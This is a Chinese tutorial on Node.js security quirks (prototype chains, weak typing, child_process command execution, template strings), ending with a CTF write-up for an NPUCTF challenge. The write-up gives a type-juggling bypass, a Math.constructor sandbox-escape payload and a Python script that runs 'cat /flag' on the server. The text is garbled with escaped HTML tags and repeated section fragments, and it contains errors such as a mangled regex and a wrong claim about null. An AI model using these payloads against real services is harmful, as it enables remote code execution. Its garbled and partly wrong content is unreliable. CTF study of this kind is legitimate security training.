Node.js 安全特性与实战解析<\/h1>

一、JavaScript 原型链机制<\/h2>

1. 原型基础概念<\/h3>
JavaScript 采用基于原型的继承模型，几乎所有对象都是 Object<\/code> 的实例。与传统的类继承不同，JavaScript 没有真正的类概念，只有对象。<\/p>
创建对象示例：<\/strong><\/p>
function<\/span> testfn<\/span>() {
<\/span><\/span>    this<\/span>.a<\/span> =<\/span> 1<\/span>;
<\/span><\/span>    this<\/span>.b<\/span> =<\/span> 2<\/span>;
<\/span><\/span>}
<\/span><\/span>var<\/span> ob<\/span> =<\/span> new<\/span> testfn<\/span>();
<\/span><\/span><\/code><\/pre>原始类型创建对象：<\/strong><\/p>
a<\/span> =<\/span> "test"<\/span>;  \/\/ 字符串
<\/span><\/span><\/span><\/span>b<\/span> =<\/span> 1<\/span>;       \/\/ 数字
<\/span><\/span><\/span><\/span>c<\/span> =<\/span> false<\/span>;   \/\/ 布尔
<\/span><\/span><\/span><\/code><\/pre>2. 特殊类型行为<\/h3>
JavaScript 的类型系统有其特殊性：<\/p>
console<\/span>.log<\/span>(typeof<\/span>(null<\/span>));  \/\/ 输出 "object"
<\/span><\/span><\/span><\/code><\/pre>null<\/code> 在 JavaScript 中被称为原型对象，是所有对象的源点。<\/p>
3. 数据类型分类<\/h3>
基本类型：<\/strong><\/p>

String<\/li>
Number<\/li>
Boolean<\/li>
null<\/li>
undefined<\/li>
<\/ul>
引用类型：<\/strong><\/p>

Object<\/li>
Array<\/li>
RegExp<\/li>
Date<\/li>
Function<\/li>
<\/ul>
这些数据类型本质上都是 JavaScript 的内置对象。<\/p>
4. 原型访问方式<\/h3>
function<\/span> testfn<\/span>() {
<\/span><\/span>    this<\/span>.a<\/span> =<\/span> 1<\/span>;
<\/span><\/span>    this<\/span>.b<\/span> =<\/span> 2<\/span>;
<\/span><\/span>}
<\/span><\/span>var<\/span> ob<\/span> =<\/span> new<\/span> testfn<\/span>();
<\/span><\/span>
<\/span><\/span>\/\/ 函数原型访问
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>(testfn<\/span>["__proto__"<\/span>]);
<\/span><\/span>console<\/span>.log<\/span>(testfn<\/span>.__proto__<\/span>);
<\/span><\/span>console<\/span>.log<\/span>(testfn<\/span>.constructor<\/span>.prototype<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 对象原型访问
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>(ob<\/span>["__proto__"<\/span>]);
<\/span><\/span>console<\/span>.log<\/span>(ob<\/span>.__proto__<\/span>);
<\/span><\/span>console<\/span>.log<\/span>(ob<\/span>.constructor<\/span>.prototype<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 重要关系：ob.__proto__ == testfn.prototype
<\/span><\/span><\/span><\/code><\/pre>5. 原型链示例<\/h3>
Array.prototype<\/span>.test<\/span> =<\/span> function<\/span> test<\/span>() {
<\/span><\/span>    console<\/span>.log<\/span>("Come from prototype"<\/span>);
<\/span><\/span>}
<\/span><\/span>a<\/span> =<\/span> []
<\/span><\/span>a<\/span>.test<\/span>()  \/\/ 输出 "Come from prototype"
<\/span><\/span><\/span><\/code><\/pre>原型链关系：<\/p>
console<\/span>.log<\/span>([].__proto__<\/span>);           \/\/ Array
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>([].__proto__<\/span>.__proto__<\/span>); \/\/ Object
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>([].__proto__<\/span>.__proto__<\/span>.__proto__<\/span>); \/\/ null
<\/span><\/span><\/span><\/code><\/pre>完整原型链：[] -> Array -> Object -> null<\/code><\/p>
二、JavaScript 弱类型特性<\/h2>
1. 大小比较规则<\/h3>
数字与字符串比较：<\/strong><\/p>
console<\/span>.log<\/span>(1<\/span> ==<\/span> '1'<\/span>);    \/\/ true
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>(1<\/span> ><\/span> '2'<\/span>);     \/\/ false
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>('1'<\/span> <<\/span> '2'<\/span>);   \/\/ true
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>(111<\/span> ><\/span> '3'<\/span>);   \/\/ true
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>('111'<\/span> ><\/span> '3'<\/span>); \/\/ false
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>('asd'<\/span> ><\/span> 1<\/span>);   \/\/ false
<\/span><\/span><\/span><\/code><\/pre>规则总结：<\/p>

数字与字符串比较时，纯数字型字符串会转为数字再比较<\/li>
字符串间比较时，比较第一个字符的 ASCII 码<\/li>
非数字型字符串与任何数字比较都是 false<\/li>
<\/ol>
数组比较：<\/strong><\/p>
console<\/span>.log<\/span>([] ==<\/span> []);          \/\/ false
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>([] ><\/span> []);           \/\/ false
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>([6<\/span>,2<\/span>] ><\/span> [5<\/span>]);       \/\/ true
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>([100<\/span>,2<\/span>] <<\/span> 'test'<\/span>);  \/\/ true
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>([1<\/span>,2<\/span>] <<\/span> '2'<\/span>);       \/\/ true
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>([11<\/span>,16<\/span>] <<\/span> "10"<\/span>);    \/\/ false
<\/span><\/span><\/span><\/code><\/pre>规则总结：<\/p>

空数组间比较永远为 false<\/li>
非空数组比较第一个元素<\/li>
数组与非数值型字符串比较，数组永远小于字符串<\/li>
数组与数值型字符串比较，比较第一个元素<\/li>
<\/ol>
特殊相等比较：<\/strong><\/p>
console<\/span>.log<\/span>(null<\/span> ==<\/span> undefined<\/span>);   \/\/ true
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>(null<\/span> ===<\/span> undefined<\/span>);  \/\/ false
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>(NaN<\/span> ==<\/span> NaN<\/span>);          \/\/ false
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>(NaN<\/span> ===<\/span> NaN<\/span>);         \/\/ false
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>(typeof<\/span>(NaN<\/span>));         \/\/ "number"
<\/span><\/span><\/span><\/code><\/pre>2. 变量拼接行为<\/h3>
console<\/span>.log<\/span>(5<\/span> +<\/span> [6<\/span>,6<\/span>]);      \/\/ "56,6"
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>("5"<\/span> +<\/span> 6<\/span>);        \/\/ "56"
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>("5"<\/span> +<\/span> [6<\/span>,6<\/span>]);    \/\/ "56,6"
<\/span><\/span><\/span><\/span>console<\/span>.log<\/span>("5"<\/span> +<\/span> ["6"<\/span>,"6"<\/span>]); \/\/ "56,6"
<\/span><\/span><\/span><\/code><\/pre>三、Node.js 模块加载与命令执行<\/h2>
1. 模块加载方式<\/h3>
常规 require 加载：<\/strong><\/p>
require<\/span>('child_process'<\/span>).exec<\/span>('calc'<\/span>);
<\/span><\/span><\/code><\/pre>通过 global 对象加载（无 require 时）：<\/strong><\/p>
global<\/span>.process<\/span>.mainModule<\/span>.constructor<\/span>._load<\/span>('child_process'<\/span>).exec<\/span>('calc'<\/span>);
<\/span><\/span><\/code><\/pre>2. 代码执行方式<\/h3>
eval 执行：<\/strong><\/p>
eval("require('child_process').exec('calc');"<\/span>);
<\/span><\/span><\/code><\/pre>定时器执行：<\/strong><\/p>
setInterval<\/span>(require<\/span>('child_process'<\/span>).exec<\/span>, 1000<\/span>, "calc"<\/span>);
<\/span><\/span>setTimeout<\/span>(require<\/span>('child_process'<\/span>).exec<\/span>, 1000<\/span>, "calc"<\/span>);
<\/span><\/span><\/code><\/pre>Function 构造函数执行：<\/strong><\/p>
Function("global.process.mainModule.constructor._load('child_process').exec('calc')"<\/span>)();
<\/span><\/span><\/code><\/pre>注意：Function 的上下文中没有 require，需要从 global 中获取。<\/p>
四、特殊字符特性<\/h2>
1. 大小写转换特性<\/h3>
存在特殊字符：<\/p>

"ı" → toUpperCase → "I"<\/li>
"ſ" → toUpperCase → "S"<\/li>
特殊 K 字符 → toLowerCase → "k"<\/li>
<\/ul>
五、ES6 模板字符串<\/h2>
1. 基本用法<\/h3>
替代括号执行函数：<\/strong><\/p>
alert<\/span>`test!!`<\/span>;
<\/span><\/span><\/code><\/pre>插入变量：<\/strong><\/p>
var<\/span> fruit<\/span> =<\/span> "apple"<\/span>;
<\/span><\/span>console<\/span>.log<\/span>`i like <\/span>${<\/span>fruit<\/span>}<\/span> very much`<\/span>;
<\/span><\/span><\/code><\/pre>2. 实现原理<\/h3>
模板字符串将字符串作为参数数组传入函数，遇到 ${}<\/code> 时会分割字符串：<\/p>
["i like "<\/span>, " very much"<\/span>, raw<\/span>:<\/span> Array(2<\/span>)]
<\/span><\/span><\/code><\/pre>限制：<\/strong><\/p>
eval`alert(2)`<\/span>  \/\/ 无法执行
<\/span><\/span><\/span><\/code><\/pre>六、实战案例：NPUCTF 验证码题目<\/h2>
1. 题目源码分析<\/h3>
关键代码片段：<\/p>
function<\/span> saferEval<\/span>(str<\/span>) {
<\/span><\/span>    if<\/span> (str<\/span>.replace<\/span>(\/(?:Math(?:\.\w+d+\.?\d*(?:e\d+)?)| \/g<\/span>, ''<\/span>)) {
<\/span><\/span>        return<\/span> null<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> eval(str<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 验证逻辑
<\/span><\/span><\/span><\/span>if<\/span> (first<\/span> &&<\/span> second<\/span> &&<\/span> first<\/span>.length<\/span> ===<\/span> second<\/span>.length<\/span> &&<\/span> 
<\/span><\/span>    first<\/span> !==<\/span> second<\/span> &&<\/span> 
<\/span><\/span>    md5<\/span>(first<\/span> +<\/span> keys<\/span>[0<\/span>]) ===<\/span> md5<\/span>(second<\/span> +<\/span> keys<\/span>[0<\/span>])) {
<\/span><\/span>    \/\/ 执行 saferEval
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 绕过验证逻辑<\/h3>
利用弱类型特性绕过：<\/p>

first<\/code> 和 second<\/code> 可以是不同类型但长度相同<\/li>
利用变量拼接特性：'a'+key[0] == ['a']+key[0]<\/code><\/li>
<\/ul>
示例请求：<\/p>
{
<\/span><\/span>    'e'<\/span>:<\/span> "1+1"<\/span>,
<\/span><\/span>    "first"<\/span>:<\/span> [1<\/span>],
<\/span><\/span>    "second"<\/span>:<\/span> "1"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 绕过 saferEval 正则<\/h3>
构造 payload 获取 Function：<\/p>
(Math=>(Math=<\/span>Math.constructor<\/span>,Math.constructor<\/span>(Math.fromCharCode<\/span>(...))()))(Math+<\/span>1<\/span>)
<\/span><\/span><\/code><\/pre>完整利用代码：<\/p>
import<\/span> requests
<\/span><\/span>import<\/span> json
<\/span><\/span>
<\/span><\/span>def<\/span> payload<\/span>():
<\/span><\/span>    s =<\/span> "return global.process.mainModule.constructor._load('child_process').execSync('cat \/flag')"<\/span>
<\/span><\/span>    return<\/span> ','<\/span>.<\/span>join([str(ord(i)) for<\/span> i in<\/span> s])
<\/span><\/span>
<\/span><\/span>a =<\/span> payload()
<\/span><\/span>url =<\/span> "http:\/\/xxx\/"<\/span>
<\/span><\/span>headers =<\/span> {"Content-Type"<\/span>: "application\/json"<\/span>}
<\/span><\/span>e =<\/span> "(Math=>(Math=Math.constructor,Math.constructor(Math.fromCharCode(<\/span>{0}<\/span>))()))(Math+1)"<\/span>.<\/span>format(a)
<\/span><\/span>data =<\/span> json.<\/span>dumps({'e'<\/span>: e, "first"<\/span>: [1<\/span>], "second"<\/span>: "1"<\/span>})
<\/span><\/span>r =<\/span> requests.<\/span>post(url, headers=<\/span>headers, data=<\/span>data)
<\/span><\/span>print(r.<\/span>text)
<\/span><\/span><\/code><\/pre>七、其他注意事项<\/h2>

let<\/code> 不能重复声明变量，会导致报错（暂存死区）<\/li>
typeof(NaN)<\/code> 返回 "number"<\/li>
Object.freeze(Object)<\/code> 和 Object.freeze(Math)<\/code> 会冻结这些对象，防止修改<\/li>
<\/ol>
Node.js 安全特性与实战解析<\/h1>

一、JavaScript 原型链机制<\/h2>

三、Node.js 模块加载与命令执行<\/h2>

四、特殊字符特性<\/h2>

五、ES6 模板字符串<\/h2>

六、实战案例：NPUCTF 验证码题目<\/h2>

七、其他注意事项<\/h2> let<\/code> 不能重复声明变量，会导致报错（暂存死区）<\/li> typeof(NaN)<\/code> 返回 "number"<\/li> Object.freeze(Object)<\/code> 和 Object.freeze(Math)<\/code> 会冻结这些对象，防止修改<\/li> <\/ol>

七、其他注意事项<\/h2>

`let<\/code> 不能重复声明变量，会导致报错（暂存死区）<\/li>`
`typeof(NaN)<\/code> 返回 "number"<\/li>`
`Object.freeze(Object)<\/code> 和 Object.freeze(Math)<\/code> 会冻结这些对象，防止修改<\/li> <\/ol>`
